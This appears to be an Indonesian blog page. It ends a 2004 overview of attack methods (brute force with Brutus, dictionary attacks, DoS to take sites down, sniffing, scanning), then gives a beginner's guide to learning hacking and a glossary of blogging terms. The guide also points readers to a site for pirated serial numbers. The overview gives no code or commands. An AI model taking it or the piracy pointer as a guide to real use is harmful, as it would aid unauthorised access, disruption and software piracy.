detil soal BFA (brute force attack) dapat di baca pada artikel artikel
yang khusus membahas soal bruteforcing.

metode ini mungkin yang paling kekal, alias sudah lama tetapi tetap dipakai
dikarenakan kelebihannya yaitu tidak perlu mengetahui sistem enkripsi, atau
metod apengamanan khususnya untuk login. tetapi memiliki berbagai '
keterbatasan tersendiri, baik dalam hal kecepatan khususnya.

ex : penggunaan brutus sebagai program yang cukup ampuh untuk membrute
password baik, ftp, http, smtp dsb

2. Dictionarry attack

kenapa aku buat terpisah dengan Brute forcing, dikarenakan metode ini
menggunakan kamus kata yang sering di gunakan, walau tetap memiliki
prinsip yang sama dengan Brute forcing. target serangan ini adalah
password , atau bis adikatakan attack terhadap authentication

3. DOS attack

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis)
atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat
menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus
kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal
(dalam kasus tertentu)

kenapa serangan ini aku masukkan karena salah satu tujuan dari kegiatan
defacing adalah untuk melakukan kegiatan yang mengakibatkan user kesulitan
mendapatkan info dari situs situs yang vital, seperti situs surat kabar,
perbankan, pemerintahan, dsb

apabila terlalu sulit untuk merubah tampilannya (deface) maka tak jarang
situs tersebut di buat ' tidur' (downkan) agar tak bisa beraktivitas dan
menghambat interaksi terhadap user/pelanggan.

pembahasan mengenai DOS dan DDOS dapat dilihat di artikel yang ditulis
oleh moby (url : http://ezine.echo.or.id) baik apa itu dos, jenisnya
software dan cara menanggulanginya.

adapun kelemahan metode ini adalah penggunaan resource secara 'boros' yang
secara tidak langsung akan menyulitkan 'attacker' itu sendiri

4. Sniffing.
kegiatan ini cukup berbahaya, seperti saya bahas di atas. Kegiatan ini
sulit di elakkan, tetapi dapat di tanggulangi dengan beberapa cara di atas.

biasanya di gunakan ettercap, ethereal, dsb

5. Scanning yang dilakukan baik terhadap mesin, port protokol dan services
yang dijalankan.

+ dapat di tanggulangi dengan menggunakan portsentry (*nix)

5. etc goes here..




End.
akhirnya....berhasil juga aku susun dan tuliskan semua yang telah dapat
aku serap selama ini, segala kekurangan dan kesalahan mohon dimaklumi.
jika berniat memberikan kritik dan saran dapat di tujukan ke
y3dips@echo.or.id


PENUTUP

Tulisan ini ditulis selama kurang lebih 4 pekan disertai keragu-raguan
untuk dipublikasikan !! :P
mulai ditulis pada : Friday, January 30, 2004, 5:05:05 AM diselesaikan
pada Monday, February 23, 2004, 6:20:04 AM

berharap dapat di sempurnakan di versi selanjutnya
(khusunya dengan bantuan teman-teman)

REFERENSI

*otak dan kecerdasan yang diberikan TUHAN yang maha tunggal !
semua url yang pernah dikunjungi
semua artikel, e-book, buku, literatur , faq, howto yang pernah dipelajari
semua teknik yang pernah di coba ,dilakukan dan di baca :P
semua guru, suhu, wizzard yang pernah mengajarkan
semua teman diskusi yang pernah di ajak berdiskusi dan bertukar pikiran
dan berbagai sumber yang tidak bisa disebutkan satu persatu


Selengkapnya.....

Hacker Yang Baik

Written by ferry89 on 20.19

--------------------------------------------------------------------------------

Ajari saya bagaimana menjadi Hacker yang baik
Menjadi hacker mungkin adalah salah satu cita-cita orang belajar komputer dan internet. Tetapi apa sebenarnya hacking, dan apa saja yang harus dilakukan untuk menjadi seorang hacker yang baik. Tulisan berikut akan memberikan petunjuk langkah per langkah bagaimana anda belajar. Petunjuk ini cocok juga untuk pemakai internet awal untuk bagaimana mencari informasi di Internet, mencari serial number, membaca artikel security serta tata cara bertanya yang baik disuatu forum diskusi.

Setelah membaca artikel ini walaupun anda membatalkan cita-cita anda, menimal anda telah mengerti pekerjaan berat apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.

Akhirnya selamat membaca.


--------------------------------------------------------------------------------

The Newbies Guide to the Internet
Originally written on: 7/1/01 revised: 13/1/01
by Clayman



--------------------------------------------------------------------------------
Untuk siapa saja tulisan ini

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Petunjuk ini ditujukan untuk tingkat pemula.

Tolong Beritahukan kepada saya bagaimana menjadi seorang hacker

Oh... tidak. Saya rasa anda terlalu banyak nonton film, atau salah pengertian tentang internet, dan berpikiran bahwa melakukan hacking adalah sangat menarik dan saya rasa hal tersebut adalah wajar saja. Kemudian, anda akan bertanya "Ajari saya bagaimana melakukan hack" atau "Bagaimana saya dapat melakukan hack terhadap situs ini". Anda adalah seorang yang panas-panas tahi ayam dan pasti akan diabaikan, dan semua orang akan memanggil anda sebagai lamer, dll ... dan hal ini juga hal yang wajar saja.

Jadi, moral dari cerita tersebut adalah : Sebelum anda bertanya "bagaimana saya dapat menjadi seorang hacker" adalah anda harus mengetahui pekerjaan berat apa yang harus anda lakukan, apa yang dimaksud dengan hacking, dll. Jadi petunjuk ini adalah langkah-langkah yang akan mengajari anda begaimana untuk belajar akan hal tersebut.
Baiklah, tetapi saya tidak mengerti.. apakah itu lamer dan newbie ?

Secara definisi tidak ada. Oleh karena itu adalah dua kata yang berbeda untuk mereka. Anda bingung tentang siapa itu newbie, lamer atau apa artinya "elite", "warez d00d", "script-kiddie" dan "wanna-be"? Mungkin anda tentu saja tidak mengerti apa yang anda baca . Tulisan ini akan menjelaskan hal ini apa ini dan apa itu:

* The Jargon File: http://www.tuxedo.org/~esr/jargon/jargon.html
* Hacker Stages: http://www.elfqrin.com/docs/HackerStages.html

Uhm.. mengapa mereka mengabaikan saya?

Pelajaran 1: Sebelum melakukan posting ke forum tertentu, baca dahulu aturan dan faq forum dari tersebut. Mengapa anda harus? Baiklah, sebagaimana anda ketahui, FAQ adalah singkatan dari frequently asked questions (pertanyaan-pertanyaan yang sering ditanyakan), dan mereka telah bosan akan hal tersebut, kemudian mereka meletakan jawaban di FAQ. Percaya atau tidak, pertanyaan seperti "ajari saya memasuki account hotmail pacar saya" adalah pertanyaan yang paling sering di tanyakan. Maka, jika anda tidak membaca faq, bukan saja anda yang kelihatan seperti idiot, tetapi anda juga menghabiskan waktu orang lain .. maka:

Aturan 1: Baca aturan pada forum. baca FAQ pada forum. Baca dua kali.

Aturan 2: Setelah benar-benar membaca aturan 1, jangan lihat yang lain dekat caps lock.

Ini juga petunjuk yang baik tentang "bagaimana melakukan posting supaya tidak diabaikan" ditulis oleh Raven, baca di www.securitywriters.org

Jadi, bagaimana kira-kira saya mendapatkan jawaban tersebut

Uhmm.. setiap orang tahu tentang yahoo.com, dan hampir setiap orang tahu tentang altavista.com. Jadi internet merupakan suatu jaringan yang sangat BESAR, maka orang menganggap usaha mencari menjadi sesuatu yang penting, sehingga mereka membuat suatu yang disebut dengan SEARCH ENGINES. Jadi, haruskah anda mencari jawan pertanyaan anda sendiri ? Ya anda harus melakukannya. Adalah sangat mungkin pertanyaan yang sama pernah ditanyakan orang lain, dan telah pula dijawab oleh yang lain, jadi gunakanlah search engine untuk pertanyaan seperti "Belajar C++". Masuk ke google.com, ketik pada kotak pencarian "Belajar C++". Sebelum belajar bagaimana melakukan pemrograman, anda mesti tahu untuk apa bahasa pemrograman tersebut, jadi carilah "What is C++". Perhatikan point-point yang ada? Sehingga Anda tidak menyebabkan orang lain melakukan hal yang sama berulang-ulang, melainkan mencari jawaban untuk diri sendiri. Ini merupakan praktek yang baik, jadi anda tidak perlu mencari orang yang dapat menjawab pertanyaan anda, karena sudah pernah ada di Internet, dan anda tinggal mencarinya.

Aturan 3: Gunakan search engine (google.com)
Aturan 4: Gunakan directori (dmoz.org, yahoo.com)

Tetapi situs tersebut tidak memenuhi keinginan saya?

Hmm.. Jika anda mencari search engine yang baik tentang security

* http://astalavista.box.sk

atau security portal yang baik

* http://neworder.box.sk
* http://securityfocus.com
* http://packetstorm.securify.com

Hmm.. Saya tidak suka membaca. Apakah ada saran lain?

Tidak ada. Anda harus banyak membaca. Hal ini adalah keharusan, karena: membaca = ilmu pengetahuan, ilmu pengetahuan = pengertian dan kebijaksanaan. Anda perlu pengertian dan kebijaksanaan untuk menjadi seorang hacker. Sederhananya, jika anda tidak suka membaca, hentikan membaca ini sekarang juga.

Jadi, apa yang anda rekomendasikan saya untuk dibaca?

Saya merekomendasikan anda membaca segala sesuatu yang anda temukan.

* http://neworder.box.sk
* http://blacksun.box.sk
* http://www.securitywriters.org
* http://www.phrack.com
* http://www.elfqrin.com/hack
* http://www.attrition.org --- tulisan ini sangat "panjang*

Uhh.. Siapa itu seorang hacker ? Apa itu hacking?

Ohh, mudah.

* Baca essay "Being Hacker" dan "Open Letter to a wannabe hacker" oleh Elf Qrin dari hacking lab essays
* Baca "The Hacker How-to" oleh Eric S. Raymond dari tuxedo.

Sangat menarik, ajari saya bagaimana melakukan hack

Baca hacking faq yang ada disana .. anda tidak membaca url yang telah saya berikan sebelumnya bukan ? Ketika anda mengerti bahwa pertanyaan ini tidak *berarti* banggalah atas diri anda. Jika anda masih melakukan post pertanyaan ini, baca dari awal petunjuk ini.

Bagaimana saya belajar programming?

Anda dapat membaca pada

* http://code.box.sk

untuk mendapatkan ide yang jelas tentang setiap bahasa. Jangan lupa untuk memeriksa tutorial dari "situs lain". Perlu diketahui bahwa, cara mendownload source-code dan melakukan kompilasi copy/paste TIDAK mengajari anda apa-apa... Jika anda rasa susah mencari source code, pergi ke:

* http://www.sourceforge.net

hal ini akan membuat anda sibuk sesaat.

Ahem, Saya menanyakan serial number dan tidak ada yang menjawab..

Hal ini tidak ada kaitannya dengan security. Ini adalah alasannya, dan anda tidak membaca aturan forum. Memakai software bajakan adalah ilegal, tetapi jika anda ingin memakainya, jangan tanyakan hal tersebut pada forum 'umum', jadi cari www.astalavista.com.

Anda punya saran?

Tentu saja.

+ Jangan menjawab kepada orang yang panas-panas tahi ayam karena hanya membuang waktu anda dan mereka.
+ Jangan membuang waktu dengan membaca pesan pada setiap forum. Bacalah beberapa yang berguna saja seperti Slashdot.org
+ Gunakan web board atau irc sebagai pilihan terakhir untuk mendapatkan informasi.
+ Jangan mengunakan scripts / program kecuali anda tahu apa yang anda lakukan.
+ Jangan mengikuti arus, seperti:

* Jangan katakan produk Microsoft tidak baik kecuali anda telah siap untuk menjawab pertanyaan "Mengapa Visual C++ lebih buruk dibandingkan dengan Borland C++ builder?"

* Jangan katakan "Linux lebih baik" jika anda tidak bisa menjawab "mengapa linux lebih baik" disamping open-source, lebih stabil, cepat, dan aman, serta kelihatan lucu.

* Jangan katakan "Menggunakan GUI tidak lebih baik, gunakan saja command line". Mengetik dengan command tidak membuat l33t. lebih cepat dari pada gui.

* Jangan berkata "Ini [program / cara / script / situs / atau yang lainnya ] lebih baik " tanpa mencoba yang lain. Bagaimana anda tahu sesuatu lebih baik tanpa mencoba setiap pilihan?

Jangan percaya setiap yang anda baca. Jangan merusak situs web orang lain. Bagaimana perasaan anda jika seseorang bermain-main dengan meletakkan gambar porno sebagai wall paper pada anak komputer anda perempuan anda yang berumur 6 tahun? atau jika hardisk yang berisi data penting anda terformat ?

Hmm, Saya tidak ada waktu...

Tidak ada masalah, menjadi pemakai biasa dapat juga bergembira. Bye bye.

Apakah anda seorang hacker?

Tidak.

Mengapa saya harus percaya sama anda?

Anda tidak perlu percaya sama saya .. atau semua orang yang tidak menanyakan hal tersebut. Jika anda merasa yang anda baca masuk akal, gunakan, jika tidak hanya untuk mengetahuinya.


--------------------------------------------------------------------------------

Selengkapnya.....

Kamus Istilah-Istilah Dalam Blog

Written by ferry89 on 17.37

Buat kamu masih hijau yang belum tahu banyak tentang dunia blog, ini ada beberapa istilah-istilah yang perlu kamu ketahui. Buat yang sudah merah, yang sudah banyak makan garam dunia blog juga nggak ada salahnya kok baca-caca artikel ini. Disini sengaja tidak disusun menurut abjad tapi disusun berdasarkan kategori masing-masing.

* Blog
Blog : istilah yang pertama kali digunakan oleh Jorn Barger untuk menyebut kelompok website pribadi yang selalu diupdate secara kontinyu dan berisi link-link ke website lain yang mereka anggap menarik disertai dengan komentar-komentar.
Weblog : istilah lain dari blog.
Blogging : kegiatan-kegiatan yang dilakukan dalam dunia blog.
Blogger : seseorang yang melakukan blogging.
arti lainnya: sebuah layanan blog dari google.
Blogosphere : komunitas dalam blogging.
Posting : kegiatan untuk mengirimkan artikel ke dalam blog.

* Bentuk-Bentuk Blogging
Photoblogging : sebuah blog yang difokuskan pada dunia Photografi dan gambar-gambar.
Podcasting : metode untuk mendistribusikan file multimedia (video/audio) secara online melalui feeds
Autocasting : bentuk podcasting secara otomatis.
Blogcasting : penggabungan blog dan postcas dalam sebuah wensite.
Vlog / Vlogging : jenis blogging yang lebih senang menggunakan video daripada text.
Audioblog / Audioblogging : jenis blogging yang lebih senang menggunakan audio/musik daripada text.
Moblogs / Moblogging kegiatan blogging dengan menggunakan HP (handphone).

* Komponen dan Fungsi-Fungsi Blog
Index page : halaman depan dari blog.
Header : bagian paling atas blog.
Footer :bagian paling bawah blog.
Sidebar : kolom-kolom yang berada di sisi blog.
Link : proses untuk menghubungkan ke suatu postingan/kontent atau ke web/blog yang lain.
Archive : sekumpulan/arsip dari semua postingan. Bisa dikelompokkan dalam bulan, tahun dsb.
Categories : sekumpulan/sekelompok spesifik dari beberapa artikel.
Commnets : Kompentar-komentar dari para pembaca blog.
Captcha : kependekan dari "Completely Automated Public Turing test to tell Computers and Humans Apart", yaitu sebuah gambar yang berisi kata atau huruf yang harus diketikkan untuk verifikasi. Berguna untuk menangkal spam.
Ping (Packet Internet Grouper) : berfungsi untuk memberitahu layanan-layanan yang berhubungan dengan blog (seperti tchnocarty dkk) bahwa kita baru menambah atau mengupdate konten blog kita.
Trackback : berfungsi untuk memberitahu bahwa kita me-link ke postingan atau kontent blog orang lain.
Blogroll : sekumpulan link yang dijukan ke blog yang lain.
Template : desain dasar blog.
Plugin : sebuah file yang berfungsi untuk menambah feature2 blog.
Dashboard : sebuah tampilan yang berisi kontrol-kontrol, tool, setting dll saat pertama kali kita login ke blog account.

*Penyedia Layanan Blog
Blogger/Blogspot : Layanan blog gratis dari google.
Wordpress : Salah satu layanan blog gratis yang lain, memiliki feature yang lebih lengkap daripada blogger.com tapi kita tidak bisa mengotak-atik script HTML, kalo mau mengedit harus bayar dulu, jadi buat yang gratisan nggak bisa ngedit.
LiveJournal : Tolls blogging gratis dari SixApart
TypePad : Tolls blogging tidak gratis (bayar) dari SixApart.

* Bloging Habits
Metablogging : menulis artikel tentang blogging.
Blogstipation : blogger yang sedang malas ngeblog, karena sedang bad mood atau nggak pingin ngeblog.
Blogopotamus : Postingan blog yang sangat panjang.
Bleg : adalah ketika seseorang memohon pada sebuah blog.
Blego : Blog+Ego, ukuran kekayaan blogger.
Blog Hopping : Berpindah-pindah dari satu blog ke blog yang lain.
Blogroach : Komentator yang tidak setuju dengan postingan atau kontent suatu blog, biasanya diungkapkan dengan kata-kata yang kasar.
Blogoholic : Pecandu Blog.
Blogorific / Blogtastic Suatu hal yang dahsyat dari perkataan blogger.
Blogsit : Pemeliharaan blog ketika sang pemilik utama blog sedang bepergian atau sedang liburan.
Blogvertising/Blogvert : Iklan-iklan yang ada di blog.
Blurker : Pembaca blog yang hanya melihat-lihat saja, tidak memberikan komentar atau apapun.
Blogathon : mengaupdate blog setiap 30 menit dan selama 24 jam non-stop.
Blogiversary : Ulang tahun Blog.
Blog Carnival : Link ke artikel yang lain yang disamarkan dengan topik yang spesifik.
Multiblog : menjalankan banyak blog.
Blog Tipping : pujian atau ucapan selamat setiap tanggal 1 setiap bulannya.
Blogger Bash : Pesta para blogger.
Reciprocal Links / Link Exchange : atau Link Love, saling me-link antara blog yang satu dengan blog yang lain.
Linkbaiting : menulis artikel yang bagus supaya dilink oleh blog yang lain.
Hitnotice : me-refresh browser berulang-ulang untuk melihat hit-counter atau melihat apakah ada komentar yang baru atau tidak.
Blogstorm / Blogswarm : Kegiatan komunitas blogger yang sangat besar.
Blogsnop : menolak respon dari komentator yang bukan temannya.
Doppelblogger : blogger yang menjiplak konten dari blog orang lain.
Blogophobia takut terhadap blog atau blogging.
Blogeerel : opini yang sama yang dikirim berulang-ulang pada sebuah blog.

Aduh capek nih, ngaso dulu ah, minum kopi dulu bos biar seger. huuaaaahhhhh...
hup..hap..hup..hap..huaaaahhhhhhhhhh
yak, udah seger lagi, mari kita lanjutkan.

* Tipe-Tipe Blogger
Problogger : Blogger yang sudah profesional.
Blogebrity : Blogger yang sangat terkenal, kayak selebriti gitu.
Blogerati : Komunitas Blogger yang sudah pinter-pinter.
Blognoscenti : Blogger yang memiliki kemampuan yang spesial.
Commnetariat : Komunitas para komentator (lho emangnya ada? ).
Dooced : kehilangan pekerjaan gara-gara blognya.
Blogther : teman/saudara/keluarga blogger.
Blogstar : Blogger yang mengoperasikan blog yang sangat populer.

* Web/Blog Feeds
Web Feed : format data yang disediakan untuk user agar bisa berlangganan pada postingan sebuah blog.
RSS : adalah sebuah file berformat XML untuk sindikas. RSS mengijinkan kita untuk berlangganan kepada web/blog yang menyediakan umpan (feed) RSS. RSS kependekan dari Really Simple Syndication (RSS 2.0), Rich Site Summary (RSS 0.91, RSS 1.0), RDF Site Summary (RSS 0.9 and 1.0).
XML : (eXtensible Markup Language).
RDF : (Resource Description Framework)
Atom : hampir sama dengan web feed.
Photofeed : web feed dengan lampiran gambar.

Selengkapnya.....

Anda ingin beriklan....